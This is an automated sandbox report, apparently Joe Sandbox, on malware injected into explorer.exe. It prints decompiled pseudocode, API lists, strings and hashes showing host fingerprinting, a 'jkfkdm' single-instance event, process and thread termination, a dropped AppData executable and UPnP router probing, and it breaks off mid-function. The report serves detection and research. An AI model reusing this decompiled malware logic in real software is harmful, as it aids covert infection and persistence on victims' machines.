0x003fe8bb
0x00000000
0x00000000
0x003fe8bd
0x003fe8cf
0x003fe8d4
0x003fe8d7
0x003fe8dd
0x003fe8dd
0x003fe8e0
0x003fe9aa
0x003fe9b4
0x003fe9b4
0x003fe9b6
0x00000000
0x00000000
0x003fe9b8
0x003fe9ba
0x003fe9ba
0x003fe9c1
0x003feac8
0x003fead1
0x003feadf
0x003feaeb
0x003feaf1
0x00000000
0x003feaf1
0x003fe9c7
0x003fe9d1
0x003fe9d1
0x003fe9d3
0x00000000
0x00000000
0x003fe9d5
0x003fe9e2
0x003fe9e8
0x003fe9f6
0x003fea0c
0x003fea1d
0x003fea4e
0x003fea56
0x003fea83
0x003fea88
0x003fea8b
0x003fea8d
0x003feaa1
0x003feaa1
0x003feaa3
0x00000000
0x00000000
0x003feaa5
0x003feaa7
0x003feab1
0x003feab1
0x003feac0
0x003feac5
0x00000000
0x00000000
0x00000000
0x00000000
0x003fea8f
0x003fea8f
0x003fea8f
0x003fea91
0x00000000
0x00000000
0x003fea93
0x003fea95
0x00000000
0x003fea95
0x003fe8f6
0x003fe8fb
0x003fe8fe
0x003fe904
0x003fe90b
0x003fe9a8
0x00000000
0x003fe9a8
0x003fe911
0x003fe913
0x003fe918
0x003fe924
0x003fe929
0x003fe92c
0x003fe932
0x003fe932
0x003fe934
0x00000000
0x00000000
0x003fe936
0x003fe948
0x003fe94e
0x003fe950
0x003fe95a
0x003fe95a
0x003fe95c
0x00000000
0x00000000
0x003fe95e
0x003fe970
0x003fe975
0x003fe978
0x003fe987
0x003fe98d
0x003fe98f
0x003fe997
0x003fe9a0
0x003fe9a5
0x00000000
0x00000000
0x00000000
0x00000000
0x003fe991
0x003fe991
0x003fe991
0x003fe993
0x00000000
0x00000000
0x003fe995
0x00000000
0x00000000
0x00000000
0x00000000
0x003fe952
0x003fe952
0x003fe952
0x003fe954
0x00000000
0x00000000
0x003fe956
0x00000000
0x003fe958
0x00000000

APIs

ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 003FE869
RegLoadKeyW.ADVAPI32(80000003,00000000,00000000), ref: 003FE948
lstrcpyA.KERNEL32(?,003FEC8D,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003FE9E2
lstrcatA.KERNEL32(?,015A081D,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003FE9F6

Strings

shell32.dll, xrefs: 003FEA6E
NTUSER_DAT, xrefs: 003FE913

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: ConvertLoadStringlstrcatlstrcpy
String ID: NTUSER_DAT$shell32.dll
API String ID: 2449795608-1820152828
Opcode ID: fb1150fba03f6a1c31f1477fdf73a9dbbeef2f5e8b9b89d376f8e832fc3e0970
Instruction ID: 8f41c9c548cee0a2908883ea3e4157597b04b9185e563c0cb80c370304fc7acb
Opcode Fuzzy Hash: fb1150fba03f6a1c31f1477fdf73a9dbbeef2f5e8b9b89d376f8e832fc3e0970
Instruction Fuzzy Hash: 2581D7B5D0021DBBDB11EBA0EC49FBF7378AB44300F1042A9E7196A1D1EBB49B448F65

Uniqueness

Uniqueness Score: 100.00%

Function 003F97A0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000100), ref: 003F9803
lstrcpynW.KERNEL32(?,?,00000100), ref: 003F9819
GetVolumeInformationW.KERNEL32(c:\,?,00000100,?,00000000,00000000,?,00000100), ref: 003F9844
lstrlenW.KERNEL32(?,0040881C,?), ref: 003F9868
lstrlenW.KERNEL32(?,00000100), ref: 003F987A
lstrcatW.KERNEL32(?,?), ref: 003F9897
lstrlenW.KERNEL32(?), ref: 003F98A1
CharUpperBuffW.USER32(?,00000100), ref: 003F98B8
lstrlenW.KERNEL32(?,00000000), ref: 003F98CA

Strings

c:\, xrefs: 003F983F

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$BuffCharComputerInformationNameUpperVolumelstrcatlstrcpyn
String ID: c:\
API String ID: 508321404-4070862797
Opcode ID: efe47d7c039fcf4ded42911ff9c85af7f1c37757a16866173e515822ee465f93
Instruction ID: 34b1f8959d7d314634dbb5a44d2706b7af21181e57303b38004bb592d02d14ce
Opcode Fuzzy Hash: efe47d7c039fcf4ded42911ff9c85af7f1c37757a16866173e515822ee465f93
Instruction Fuzzy Hash: 323130B591020CABDB11DF64DD55FEE7779EB88300F00C199F619AB280DA759A848FA4

Uniqueness

Uniqueness Score: 5.54%

Function 003FBB30, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 193
UNIQUE

Download Yara Rule

C-Code - Quality: 41%

			E003FBB30(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				CHAR* _v24;
				int _v28;
				void* _v40;
				void* _v44;
				int _v48;
				long _v52;
				long _v56;
				int _t65;
				CHAR* _t66;
				void* _t79;
				void* _t81;
				void* _t85;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t132;

				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t65 = E003FB9A0( &_v20);
				_t128 = _t127 + 4;
				_v16 = _t65;
				if(_v16 != 0) {
					_t66 = E003F9AE0("jkfkdm");
					_t129 = _t128 + 4;
					_v24 = _t66;
					if(_v24 != 0) {
						_v12 = 0;
						while(_v12 < _v20 && _v28 == 0) {
							_v48 = 0;
							while(0 != 0) {
							}
							_v48 = 0;
							L17:
							while(_v48 < 2 && _v28 == 0) {
								E003F4120( &_v44,  &_v44, 0, 0x10);
								_t132 = _t129 + 0xc;
								while(1) {
									_v52 = 0;
									_v56 = 0;
									_t79 = E003F4620(_v16,  *((intOrPtr*)(_v16 + _v12 * 4)),  &_v44);
									_t129 = _t132 + 8;
									if(_t79 < 0) {
										break;
									}
									_t81 = E003FBDA0( &_v44, _a4,  &_v44, _a8);
									_t129 = _t129 + 0xc;
									if(_t81 != 0) {
										_v8 = CreateEventA(0, 0, 0, _v24);
										if(_v8 != 0) {
											_v56 = GetLastError();
											while(0 != 0) {
											}
											if(_v56 != 0xb7) {
												L34:
												_t85 = E003FBEF0( &_v44,  &_v44);
												_t132 = _t129 + 4;
												if(_t85 != 0) {
													_v52 = WaitForSingleObject(_v8, 0x2710);
													if(_v52 != 0) {
														if(_v52 != 0x102) {
															while(0 != 0) {
															}
															L46:
															CloseHandle(_v8);
															if(0 != 0) {
																continue;
															}
															L47:
															if(_v44 == 0) {
																while(0 != 0) {
																}
																L57:
																_v48 = _v48 + 1;
																goto L17;
															}
															if(_v28 != 0) {
																L54:
																CloseHandle(_v40);
																CloseHandle(_v44);
																goto L57;
															}
															while(0 != 0) {
															}
															while(0 != 0) {
															}
															TerminateProcess(_v44, 0);
															goto L54;
														}
														while(0 != 0) {
														}
														goto L46;
													}
													while(0 != 0) {
													}
													_v28 = 1;
													goto L46;
												}
												CloseHandle(_v8);
												goto L47;
											}
											while(0 != 0) {
											}
											goto L34;
										}
										while(0 != 0) {
										}
										goto L47;
									}
									goto L47;
								}
								goto L47;
							}
							_v12 = _v12 + 1;
						}
						_v12 = 0;
						while(_v12 < _v20) {
							E003F3F10(_v16 + _v12 * 4, 0xfffffffe);
							_t129 = _t129 + 8;
							_v12 = _v12 + 1;
						}
						E003F3F10( &_v16, 0);
						E003F3F10( &_v24, 0xffffffff);
						return _v28;
					}
					while(0 != 0) {
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003fbb36
0x003fbb3d
0x003fbb44
0x003fbb4b
0x003fbb52
0x003fbb5d
0x003fbb62
0x003fbb65
0x003fbb6c
0x003fbb80
0x003fbb85
0x003fbb88
0x003fbb8f
0x003fbb9e
0x003fbbb0
0x003fbbc6
0x003fbbcd
0x003fbbd1
0x003fbbd3
0x00000000
0x003fbbe5
0x003fbc01
0x003fbc06
0x003fbc09
0x003fbc09
0x003fbc10
0x003fbc25
0x003fbc2a
0x003fbc2f
0x00000000
0x00000000
0x003fbc42
0x003fbc47
0x003fbc4c
0x003fbc63
0x003fbc6a
0x003fbc7d
0x003fbc80
0x003fbc84
0x003fbc8d
0x003fbc95
0x003fbc99
0x003fbc9e
0x003fbca3
0x003fbcc0
0x003fbcc7
0x003fbcdf
0x003fbce9
0x003fbced
0x003fbcef
0x003fbcf3
0x003fbcfb
0x00000000
0x00000000
0x003fbd01
0x003fbd05
0x003fbd3b
0x003fbd3f
0x003fbd41
0x003fbbe2
0x00000000
0x003fbbe2
0x003fbd0b
0x003fbd25
0x003fbd29
0x003fbd33
0x00000000
0x003fbd33
0x003fbd0d
0x003fbd11
0x003fbd13
0x003fbd17
0x003fbd1f
0x00000000
0x003fbd1f
0x003fbce1
0x003fbce5
0x00000000
0x003fbce7
0x003fbcc9
0x003fbccd
0x003fbccf
0x00000000
0x003fbccf
0x003fbca9
0x00000000
0x003fbca9
0x003fbc8f
0x003fbc93
0x00000000
0x003fbc8f
0x003fbc6c
0x003fbc70
0x00000000
0x003fbc72
0x00000000
0x003fbc4e
0x00000000
0x003fbc31
0x003fbbad
0x003fbbad
0x003fbd4b
0x003fbd5d
0x003fbd71
0x003fbd76
0x003fbd5a
0x003fbd5a
0x003fbd81
0x003fbd8f
0x00000000
0x003fbd97
0x003fbb91
0x003fbb95
0x00000000
0x003fbb97
0x003fbb6e
0x003fbb72
0x00000000

APIs

TerminateProcess.KERNEL32(00000000,00000000), ref: 003FBD1F
CloseHandle.KERNEL32(?), ref: 003FBD29
CloseHandle.KERNEL32(00000000), ref: 003FBD33

Strings

jkfkdm, xrefs: 003FBB7B

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle$ProcessTerminate
String ID: jkfkdm
API String ID: 1541851893-2652042395
Opcode ID: 5c9b5e4ff48c735b58e5a4f06cda83da2e2c4f85c5b0ad5b621386b6447e00a8
Instruction ID: d54f63fe2fd5c5a792bdf9dbe9728400bef8f005190007aa13ffc2a4dcbe559b
Opcode Fuzzy Hash: 5c9b5e4ff48c735b58e5a4f06cda83da2e2c4f85c5b0ad5b621386b6447e00a8
Instruction Fuzzy Hash: D3618FF4D0420DEBDF16CFA0D885BBFF779AB14304F208529E7026A684DB759A44DB62

Uniqueness

Uniqueness Score: 100.00%

Function 0150327D, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
sleepthreadUNIQUE

Download Yara Rule

C-Code - Quality: 81%

			E0150327D(void* __ecx, void* __edx, signed int __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				intOrPtr _t14;
				void* _t15;
				signed int _t16;
				char _t19;
				char _t21;
				void* _t22;
				void* _t23;
				void* _t37;
				intOrPtr _t41;
				void* _t43;
				signed int _t46;
				signed int _t48;
				void* _t50;
				intOrPtr* _t51;
				void* _t56;

				_t56 = __fp0;
				_t46 = __esi;
				_t37 = __ecx;
				while(E01518890(_t37,  *0x1537918, 0) < 0) {
					E01514080( &_v12);
					_t14 =  *0x153792c; // 0x0
					_t41 =  *0x1537928; // 0x0
					_t37 = _t41 + 0xe10;
					asm("adc eax, edi");
					__eflags = _t14 - _v8;
					if(__eflags > 0) {
						L9:
						_t15 = 0xfffffffe;
						return _t15;
					}
					if(__eflags < 0) {
						L4:
						_t16 = TerminateThread( *0x1537930, 0);
						__eflags = _t16;
						if(_t16 == 0) {
							break;
						}
						Sleep(0x3e8);
						continue;
					}
					__eflags = _t37 - _v12;
					if(_t37 >= _v12) {
						goto L9;
					}
					goto L4;
				}
				_push(_t46);
				E01513BA0(_t37,  &_v28, 0, 0x10);
				_t19 =  *0x1537948; // 0x195f810
				_v28 = _t19;
				_t21 = E01519030(_t37, _a4,  &_v16);
				_t51 = _t50 + 0x14;
				_v20 = _t21;
				if(_t21 != 0) {
					_t22 = GetCurrentProcess();
					_t23 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t23, _t22, 0x1537930, 0, 0, 2);
					E01514080(0x1537928);
					 *_t51 = E01502B82;
					_push( &_v28);
					_t48 = E01502F9E(_t37, _t56);
					_pop(_t43);
					__eflags = _t48;
					if(_t48 >= 0) {
						_push(E015088F6());
						L015216AA();
						E01515AF0(0x27, _t34);
						E01515C00(_t43, 0, "jkfkdm");
						_t51 = _t51 + 0x10;
					}
				} else {
					_t48 = _t46 | 0xffffffff;
				}
				CloseHandle( *0x1537930);
				 *0x1537930 = 0;
				E015188D0( *0x1537918);
				E01513990( &_v20, 0);
				return _t48;
			}

0x0150327d
0x0150327d
0x0150327d
0x015032cd
0x0150328c
0x01503291
0x01503297
0x0150329d
0x015032a3
0x015032a5
0x015032a8
0x0150330f
0x01503311
0x00000000
0x01503311
0x015032aa
0x015032b1
0x015032b8
0x015032be
0x015032c0
0x00000000
0x00000000
0x015032c7
0x00000000
0x015032c7
0x015032ac
0x015032af
0x00000000
0x00000000
0x00000000
0x015032af
0x015032df
0x015032e7
0x015032ec
0x015032f1
0x015032fb
0x01503300
0x01503303
0x01503308
0x01503326
0x01503329
0x01503333
0x0150333e
0x01503346
0x0150334d
0x01503353
0x01503356
0x01503357
0x01503359
0x01503360
0x01503361
0x01503369
0x01503374
0x01503379
0x01503379
0x0150330a
0x0150330a
0x0150330a
0x01503382
0x0150338e
0x01503394
0x0150339e
0x00000000

APIs

Part of subcall function 01518890: WaitForSingleObject.KERNEL32(?,?,?,?,01506F8C,?,00003A98), ref: 0151889C

TerminateThread.KERNEL32(00000000), ref: 015032B8
Sleep.KERNEL32(000003E8), ref: 015032C7
CloseHandle.KERNEL32 ref: 01503382

Strings

jkfkdm, xrefs: 0150336E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandleObjectSingleSleepTerminateThreadWait
String ID: jkfkdm
API String ID: 4113059145-2652042395
Opcode ID: c4dc4f439729ea36f5144333c5b5dd85c825ecc94d83715937f19c2bbccb258c
Instruction ID: 46551ba4249bd8dfe98a5a132e347fd466e2b7a869af5065c17b671ba7329526
Opcode Fuzzy Hash: c4dc4f439729ea36f5144333c5b5dd85c825ecc94d83715937f19c2bbccb258c
Instruction Fuzzy Hash: 9A31B5B3D00207AEDB22ABE5EC49D9E3B68FBD5760F010A19E511AF284EB349544E761

Uniqueness

Uniqueness Score: 100.00%

Function 0151E970, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E0151E970() {
				intOrPtr _t2;
				struct HINSTANCE__* _t7;
				void* _t12;
				void* _t13;

				_t2 = E0151D770(GetCurrentProcess());
				_t13 = _t12 + 4;
				 *0x1538ba4 = _t2;
				while(0 != 0) {
				}
				 *0x153a84c = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				__eflags = GetModuleFileNameW(0, "C:\Windows\explorer.exe", 0x105);
				if(__eflags != 0) {
					_t7 = E015168D0(__eflags, "C:\Windows\explorer.exe", 0x5c);
					_t13 = _t13 + 8;
					 *0x153a704 = _t7;
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					 *0x153a704 = 0;
				}
				 *0x15390bc = E015168D0(__eflags, "C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe", 0x5c);
				E01513BA0(0, 0x1538aa0, 0, 0x9c);
				0x1538aa0->dwOSVersionInfoSize = 0x9c;
				return GetVersionExA(0x1538aa0);
			}

0x0151e97a
0x0151e97f
0x0151e982
0x0151e987
0x0151e98b
0x0151e9a4
0x0151e9bb
0x0151e9bd
0x0151e9d8
0x0151e9dd
0x0151e9e0
0x0151e9bf
0x0151e9bf
0x0151e9bf
0x0151e9c1
0x00000000
0x00000000
0x0151e9c3
0x0151e9c5
0x0151e9c5
0x0151e9f4
0x0151ea05
0x0151ea0d
0x0151ea23

APIs

GetCurrentProcess.KERNEL32(?,01505635,00000000), ref: 0151E973

Part of subcall function 0151D770: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0151D79C

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0151E997
GetProcAddress.KERNEL32(00000000), ref: 0151E99E
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\explorer.exe,00000105), ref: 0151E9B5
GetVersionExA.KERNEL32(01538AA0), ref: 0151EA1C

Part of subcall function 015168D0: _wcschr.LIBCMTD ref: 015168EC

Strings

C:\Windows\explorer.exe, xrefs: 0151E9AE, 0151E9D3
IsWow64Process, xrefs: 0151E98D
kernel32, xrefs: 0151E992
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 0151E9E7

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: ModuleProcess$AddressCurrentFileHandleNameOpenProcTokenVersion_wcschr
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$C:\Windows\explorer.exe$IsWow64Process$kernel32
API String ID: 380517091-2121607997
Opcode ID: 22c9b09447907be6473c7ab3537ee604253d8679a75a182ea46a2f796d899667
Instruction ID: ecefa7cb8c4ba475bd9d149501b89777b996f920afbb32b2197262b1afd081ec
Opcode Fuzzy Hash: 22c9b09447907be6473c7ab3537ee604253d8679a75a182ea46a2f796d899667
Instruction Fuzzy Hash: D50175B6A84301EBF6726F717C0BF193AA5F751712F014119FA15DF689E7F40008AB22

Uniqueness

Uniqueness Score: 100.00%

Function 0150BDA0, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 312
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0150BDA0(intOrPtr* _a4, void* _a8, void* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				int _v16;
				char _v32;
				signed int _v36;
				int _v40;
				intOrPtr* _v44;
				void* _t158;
				void* _t173;
				void* _t178;
				void* _t181;
				intOrPtr _t185;
				int _t195;
				signed int _t198;
				void* _t285;
				void* _t289;
				void* _t290;
				void* _t295;

				_v8 = 0;
				_v36 = 0;
				_v40 = 0xffffffff;
				_v16 = 0;
				if(_a4 != 0) {
					_v44 = _a4;
					while(_v44 != 0) {
						_v36 = _v36 + 1;
						_v44 =  *_v44;
					}
					if(_v36 <= 0) {
						L9:
						_v44 = _a4;
						_v12 = 0;
						while(_v44 != 0) {
							_t32 = 4 + _v12 * 0xc; // 0x4
							_t185 = E0150E180( *((intOrPtr*)(_v44 + 4)), _v8 + _t32, _a16, _a20,  *((intOrPtr*)(_v44 + 0xc)));
							_t285 = _t285 + 0x14;
							 *((intOrPtr*)(_v8 + _v12 * 0xc)) = _t185;
							if( *((intOrPtr*)(_v8 + _v12 * 0xc)) != 0) {
								memset(_a12, 0, 0xb84);
								memset(_a8, 0, 0x14);
								E0150AAF0( *((intOrPtr*)(_v8 + _v12 * 0xc)),  *((intOrPtr*)(_v8 + 4 + _v12 * 0xc)), _a12);
								_t195 = strcmp(_a12 + 0x304, "urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1");
								_t285 = _t285 + 0x2c;
								if(_t195 == 0) {
									 *((intOrPtr*)(_v8 + 8 + _v12 * 0xc)) = 1;
									_v16 = _v16 + 1;
								}
							}
							_v44 =  *_v44;
							_v12 = _v12 + 1;
						}
						_v40 = 1;
						while(_v40 <= 3) {
							_v44 = _a4;
							_v12 = 0;
							while(_v44 != 0) {
								if( *((intOrPtr*)(_v8 + _v12 * 0xc)) == 0) {
									L36:
									_v44 =  *_v44;
									_v12 = _v12 + 1;
									continue;
								}
								memset(_a12, 0, 0xb84);
								memset(_a8, 0, 0x14);
								E0150AAF0( *((intOrPtr*)(_v8 + _v12 * 0xc)),  *((intOrPtr*)(_v8 + 4 + _v12 * 0xc)), _a12);
								_t289 = _t285 + 0x24;
								if( *((intOrPtr*)(_v8 + 8 + _v12 * 0xc)) != 0 || _v40 >= 3) {
									E0150B8E0(_a8, _a12,  *((intOrPtr*)(_v44 + 4)),  *((intOrPtr*)(_v44 + 0xc)));
									_t285 = _t289 + 0x10;
									if(_v40 < 2) {
										_t158 = E0150BD50(_a8, _a12);
										_t290 = _t285 + 8;
										if(_t158 == 0) {
											L30:
											E0150BCB0(_a8, _a8);
											_t289 = _t290 + 4;
											if( *((char*)(_a12 + 0x704)) == 0) {
												goto L35;
											}
											memcpy(_a12 + 0x984, _a12 + 0x384, 0x200);
											memcpy(_a12 + 0x384, _a12 + 0x584, 0x200);
											memcpy(_a12 + 0x584, _a12 + 0x984, 0x200);
											E0150B8E0(_a8, _a12,  *((intOrPtr*)(_v44 + 4)),  *((intOrPtr*)(_v44 + 0xc)));
											_t173 = E0150BD50(_a8, _a12);
											_t295 = _t289 + 0x3c;
											if(_t173 == 0) {
												L34:
												E0150BCB0(_a8, _a8);
												_t289 = _t295 + 4;
												goto L35;
											}
											_t178 = E0150C320( *_a8, _a12 + 0x504,  &_v32);
											_t295 = _t295 + 0xc;
											if(_t178 != 0) {
												goto L34;
											}
											L39:
											if(_v8 == 0) {
												L47:
												return _v40;
											}
											_v12 = 0;
											while(_v12 < _v36) {
												if( *((intOrPtr*)(_v8 + _v12 * 0xc)) != 0) {
													E01513990(_v12 * 0xc + _v8, 0);
													_t285 = _t285 + 8;
												}
												_v12 = _v12 + 1;
											}
											E01513990( &_v8, 0);
											goto L47;
										}
										_t181 = E0150C320( *_a8, _a12 + 0x504,  &_v32);
										_t290 = _t290 + 0xc;
										if(_t181 != 0) {
											goto L30;
										}
										goto L39;
									}
									goto L39;
								} else {
									L35:
									memset(_a12, 0, 0xb84);
									_t285 = _t289 + 0xc;
									goto L36;
								}
							}
							_v40 = _v40 + 1;
						}
						_v40 = 0;
						goto L39;
					}
					_t198 = E01513960(_v36 * 0xc, _v36 * 0xc);
					_t285 = _t285 + 4;
					_v8 = _t198;
					if(_v8 != 0) {
						goto L9;
					}
					return _t198 | 0xffffffff;
				}
				return 0;
			}

0x0150bda6
0x0150bdad
0x0150bdb4
0x0150bdbb
0x0150bdc6
0x0150bdd2
0x0150bddf
0x0150bdeb
0x0150bddc
0x0150bddc
0x0150bdf4
0x0150be16
0x0150be19
0x0150be1c
0x0150be36
0x0150be58
0x0150be64
0x0150be69
0x0150be75
0x0150be85
0x0150be92
0x0150bea2
0x0150bec9
0x0150bee0
0x0150bee5
0x0150beea
0x0150bef5
0x0150bf03
0x0150bf03
0x0150beea
0x0150be2a
0x0150be33
0x0150be33
0x0150bf0b
0x0150bf1d
0x0150bf2a
0x0150bf2d
0x0150bf47
0x0150bf5e
0x0150c11a
0x0150bf3b
0x0150bf44
0x00000000
0x0150bf44
0x0150bf6f
0x0150bf7f
0x0150bfa6
0x0150bfab
0x0150bfbc
0x0150bfde
0x0150bfe3
0x0150bfea
0x0150bff9
0x0150bffe
0x0150c003
0x0150c029
0x0150c02d
0x0150c032
0x0150c041
0x00000000
0x00000000
0x0150c05f
0x0150c07f
0x0150c0a0
0x0150c0be
0x0150c0ce
0x0150c0d3
0x0150c0d8
0x0150c0fb
0x0150c0ff
0x0150c104
0x00000000
0x0150c104
0x0150c0ed
0x0150c0f2
0x0150c0f7
0x00000000
0x00000000
0x0150c12b
0x0150c12f
0x0150c17e
0x00000000
0x0150c17e
0x0150c131
0x0150c143
0x0150c158
0x0150c166
0x0150c16b
0x0150c16b
0x0150c140
0x0150c140
0x0150c176
0x00000000
0x0150c17b
0x0150c018
0x0150c01d
0x0150c022
0x00000000
0x00000000
0x00000000
0x0150c024
0x00000000
0x0150c107
0x0150c107
0x0150c112
0x0150c117
0x00000000
0x0150c117
0x0150bfbc
0x0150bf1a
0x0150bf1a
0x0150c124
0x00000000
0x0150c124
0x0150bdfd
0x0150be02
0x0150be05
0x0150be0c
0x00000000
0x00000000
0x00000000
0x0150be0e
0x00000000

Strings

urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1, xrefs: 0150BED1

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1
API String ID: 0-1163898259
Opcode ID: 81795eb12eab8732296a68904641377e07a19623196f6b6df4425bb83a0d0cc2
Instruction ID: 1dcca4a2ad7d772f713a984e6e71482543c199b7d9bd778aec798db6df18ffd6
Opcode Fuzzy Hash: 81795eb12eab8732296a68904641377e07a19623196f6b6df4425bb83a0d0cc2
Instruction Fuzzy Hash: 88C15EB5A0020AEBDB09DF98C9D1BAEB7B5FF99304F148558E905AF2C1D731EA50CB50

Uniqueness

Uniqueness Score: 100.00%

Function 01510BDC, Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 53
stringUNIQUE

Download Yara Rule

C-Code - Quality: 65%

			E01510BDC(char* _a4) {
				signed int _t9;
				void* _t11;

				if( *0x15361d4 != 0x59) {
					strncpy(0x15361d4, "YNNN", 0x1f);
					if(strncmp(0x15361d4, _a4, 0x1f) == 0) {
						if(E01510C78() >= 0) {
							if(E01510C9E() >= 0) {
								return 0;
							} else {
								_push("osdepEntropyOpen failed\n");
								_t9 = E01510CBC(E01510CBC(_t6));
								goto L4;
							}
						} else {
							_push("osdepTimeOpen failed\n");
							_t9 = E01510CBC(_t5);
							goto L4;
						}
					} else {
						_push("core\\corelib.c");
						_push("psError %s");
						_t11 = E01510CBC(_t4);
						_push(0x37);
						_push(":%d ");
						E01510CBC(_t11);
						_t9 = E01510B9E("Core config mismatch.\nLibrary: YNNN\nCurrent: %s\n", _a4);
						L4:
						return _t9 | 0xffffffff;
					}
				} else {
					return 1;
				}
			}

0x01510be6
0x01510bfb
0x01510c11
0x01510c4a
0x01510c60
0x01510c77
0x01510c62
0x01510c62
0x01510c6d
0x00000000
0x01510c6d
0x01510c4c
0x01510c4c
0x01510c51
0x00000000
0x01510c56
0x01510c13
0x01510c13
0x01510c18
0x01510c1d
0x01510c22
0x01510c24
0x01510c29
0x01510c36
0x01510c3e
0x01510c42
0x01510c42
0x01510be8
0x01510bec
0x01510bec

APIs

strncpy.MSVCRT(YNNN,YNNN,0000001F,?,?,0150F0D7,YNNN,?,?,?,?,0150EB06,YNNNNNN,?,?,015063A7), ref: 01510BFB
strncmp.MSVCRT(YNNN,?,0000001F,YNNN,YNNN,0000001F,?,?,0150F0D7,YNNN,?,?,?,?,0150EB06,YNNNNNN), ref: 01510C06

Strings

Core config mismatch.Library: YNNNCurrent: %s, xrefs: 01510C31
osdepTimeOpen failed, xrefs: 01510C4C
psError %s, xrefs: 01510C18
core\corelib.c, xrefs: 01510C13
YNNN, xrefs: 01510BF0
:%d , xrefs: 01510C24
YNNN, xrefs: 01510BF5, 01510BFA, 01510C05
osdepEntropyOpen failed, xrefs: 01510C62

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strncmpstrncpy
String ID: :%d $Core config mismatch.Library: YNNNCurrent: %s$YNNN$YNNN$core\corelib.c$osdepEntropyOpen failed$osdepTimeOpen failed$psError %s
API String ID: 2502451431-4237030625
Opcode ID: f526f10199b02f4e4be82e046ad34ce002dd46a538332b0d0c43f6de3468a6f3
Instruction ID: 166990e65de6b0aa20830fe8566a8b4912a4eb0c704fb213401f4f6a4b11bcc6
Opcode Fuzzy Hash: f526f10199b02f4e4be82e046ad34ce002dd46a538332b0d0c43f6de3468a6f3
Instruction Fuzzy Hash: 5101F93368172B74F91333B5DE82EAFA5487FA265DF000428FD089D4CAFAD181D189A1

Uniqueness

Uniqueness Score: 100.00%

Function 01502792, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 220
UNIQUE

Download Yara Rule

C-Code - Quality: 34%

			E01502792(void* __ecx, intOrPtr _a4, signed char _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v8;
				int _v307;
				char _v308;
				char _v564;
				char _v820;
				intOrPtr _t71;
				signed int _t74;
				signed int _t77;
				signed int _t84;
				signed int _t85;
				int _t98;
				int _t103;
				void* _t105;
				signed char _t108;
				signed int _t109;
				void* _t114;
				signed int _t115;
				signed char _t116;
				signed int _t117;
				signed int _t118;
				intOrPtr* _t119;
				intOrPtr _t120;
				char* _t122;
				char* _t124;
				signed char _t125;
				signed int _t126;
				signed int _t129;
				void* _t130;
				void* _t131;
				void* _t132;
				void* _t134;

				E01513BA0(__ecx,  &_v308, 0, 0x12c);
				_t116 = _a8;
				_t71 =  *((intOrPtr*)(_t116 + 0x2a));
				_t132 = _t131 + 0xc;
				_v308 = 5;
				if(_t71 != 0) {
					__eflags = _t71 - 1;
					if(_t71 != 1) {
						__eflags = _t71 - 2;
						if(_t71 != 2) {
							L51:
							__eflags = 0;
